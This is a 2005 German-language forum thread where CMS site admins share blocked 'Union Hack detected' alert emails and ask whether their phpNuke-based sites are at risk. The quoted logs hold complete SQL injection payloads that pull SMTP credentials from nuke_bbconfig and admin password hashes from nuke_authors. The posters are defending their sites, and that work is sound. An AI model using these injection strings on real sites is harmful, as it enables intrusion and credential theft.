[Union] Hack detected (0)

Begonnen von BlackBoSs, 01 Januar 2005, 23:05:16

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

BlackBoSs

Hi Leute
ich bekamm vorhin ne mail
mit dieser inhalt
hab ich nen hackangriff auf der seite ?



01-01-2005 18:56:38 [Union] Hack detected (0)
user: Taninmayan
admin: Taninmayan
request:
_GET[name] = Downloads 
_GET[d_op] = viewdownloadeditorial 
_GET[lid] = -1 UNION SELECT config_name,0,config_value,0 FROM nuke_bbconfig
where config_name=char(115,109,116,112,95,104,111,115,116) OR
config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101) OR
config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100)
Serverinfo:
REMOTE_ADDR:          195.175.37.38
QUERY_STRING:       
name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20config_name,0,config_value,0%20FROM%20nuke_bbconfig%20where%20config_name=char(115,109,116,112,95,104,111,115,116)%20OR%20config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101)%20OR%20config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100)
REQUEST_URI:         
/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20config_name,0,config_value,0%20FROM%20nuke_bbconfig%20where%20config_name=char(115,109,116,112,95,104,111,115,116)%20OR%20config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101)%20OR%20config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100)
REMOTE_PORT:          57812
REMOTE_HOST:         
HTTP_REFERER:       
http://www.xxxxxxxxxxxx.com/phpnuke.asp?action=xxxxxxxxx&site=http://www.karizmatik.at
HTTP_USER_AGENT:      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
i-NavFourF; .NET CLR 1.1.4322)
HTTP_X_FORWARDED_FOR: 81.215.157.240


siteadress: http://www.dermanim.at

Andi

#1
Moin :)

wenn du die mail erhalten hast, dann wurde der Angriff erkannt und geblockt.

Das war aber ein totaler noop-Hacker, wenn er sogar als User angemeldet ist und den referer preisgibt....
Interessant ist der Referer, den habe ich in deinem Post entfernt.

Edit:

Hmm, hau deinem Co-Admin mal auf die Finger....
schön´s Grüssle, Andi

BlackBoSs

hmms :) hab seine remote adresse eh jetzt unter ip sperre drinnen :)
aber danke nochmals

Selkie

Schreib doch mal eine Mail an seinen Provider! Einfach mal erzählen, daß du dich über diesen Typen beschweren möchtest! Er wird schon was von seinem Provider zu hören bekommen! *g

Halte das immer so! Wer dummfug treibt, brauch sich auch nicht wundern!

Angemerkt: DAS IST INTERNET Mißbrauch!

BlackBoSs

danke für dein tipp selkie ich hab mich gleich an meinem provider ne mail geschrieben ...

munzur

#5
@Blackboss

Du weisst ja eh das ich mit dir nicht viel zu tun haben will, und diese "ATTACKEN" versuche auf meinen Seiten würd ich wenn ich du wär lassen.
Ich würd es nciht drauf ankommen lassen. Und wenn du es schon versuchst dann machs gescheit. XXXXX

L.g



Editiert von Tora, wegen hier unerwünschtem Schimpfwort.
Nochmal, dann Verwarnung!
"Debug-Mode" einschalten.
"SQL-Fehler anzeigen" einschalten
und evt. auftauchende Fehlermeldungen posten .

BlackBoSs

Zitat von: munzur am 03 Januar 2005, 15:04:57
@Blackboss

Du weisst ja eh das ich mit dir nicht viel zu tun haben will, und diese "ATTACKEN" versuche auf meinen Seiten würd ich wenn ich du wär lassen.
Ich würd es nciht drauf ankommen lassen. Und wenn du es schon versuchst dann machs gescheit. XXXXX

L.g



Editiert von Tora, wegen hier unerwünschtem Schimpfwort.
Nochmal, dann Verwarnung!



munzur was kann ich dafür wenn jeder 2. hacker meine seite hacken will ???
#

--helmi-

#7
Hallo..

Hab heut auch nen "stallvoll" solcher mails bekommen..!  :mad: :D

Im Refferer fand ich folgende (interessante..!?) Adresse:
http://www.xxxxx.com/phpnukehack.php?target=http%3A%2F%2Fwww.*******-a
(Sternle von mir!  ;) )  Und hier http://www.xxxxxxx.com/phpnuke.php  kommt der Sch**ss her.. :mad:

Was ist davon zu halten? Geht davon eine reale Gefahr aus? Kann und sollte man dagegen was unternehmen..? Und wer fühlt sich dann zuständig..? Scheint ja offensichtlich türkischen Ursprung zu haben.. (Lütfen = türkisch "Bitte"  :-\

*******************
Viele Grüße: --helmi- !


>>---Mission Control 42 -->


---

Andi

Hi :)

diese Hackerseiten gibt es zuhauf im Web.
Da werden die bisher bekannten Standardangriffe auf phpNuke direkt als Link angeboten.

Die sind im vkpMx wirkungslos!
Was nicht heisst, dass irgendwas neues in einem externen Modul entdeckt wird, was auch im vkpMx als Angriffsfläche genutzt werden kann.

Habe den Link oben geändert, weil ungefixte phpNuke Installationen sind dadurch sehr wohl gefärdet.
schön´s Grüssle, Andi

--helmi-


Naja.. jetzt bin ich ein klein wenig beruhigter..!  ;)
*******************
Viele Grüße: --helmi- !


>>---Mission Control 42 -->


---

Snow2002

hallo,
haben diese mail jetzt gerade auch im posteingang gehabt. komisch, da hat es scheinbar jemand auf die mx-seiten abgesehen.

Zitat
--------------------------------------------------
22-04-2005 20:17:56 [Union] Hack detected (0)
user: Anonymous
admin: Anonymous
request:
_GET[name] = Top 
_GET[querylang] =  WHERE 1=2 UNION ALL SELECT 1,pwd,1,1 FROM nuke_authors/* 
_COOKIE[lang] = german 
_COOKIE[lang (encoded)] = êæj
Serverinfo:
REMOTE_ADDR:          85.86.23.237
QUERY_STRING:         name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
REQUEST_URI:          /version2/html/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
REMOTE_PORT:          1501
REMOTE_HOST:         
HTTP_REFERER:         
HTTP_USER_AGENT:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
HTTP_X_FORWARDED_FOR:


siteadress: http://www.*****.de

lt. securelog ging diese mail nicht nur an unsere e-mail-adresse, sondern 1 sekunde später auch an euch. muss ich mir sorgen machen?
Gruß, Marcus

--------
pragmaMx 0.1.10 RC1, 1.30.2.12/2008-01-29
PHP-Version:    5.1.2  (PHP-Info)
MySQL-Version: 4.1.18-standard
Server-Version:  Apache/1.3.37 (Unix)
SMF: 1.1.4

jubilee

Hallo !
Zitatkomisch, da hat es scheinbar jemand auf die mx-seiten abgesehen.

Nein, Nuke-Seiten generell ....
Zitatlt. securelog ging diese mail nicht nur an unsere e-mail-adresse, sondern 1 sekunde später auch an euch. muss ich mir sorgen machen?
Nein, wenn eine Mail generiert wird, hat das System den Angriff erkannt und geblockt.
MfG
jubilee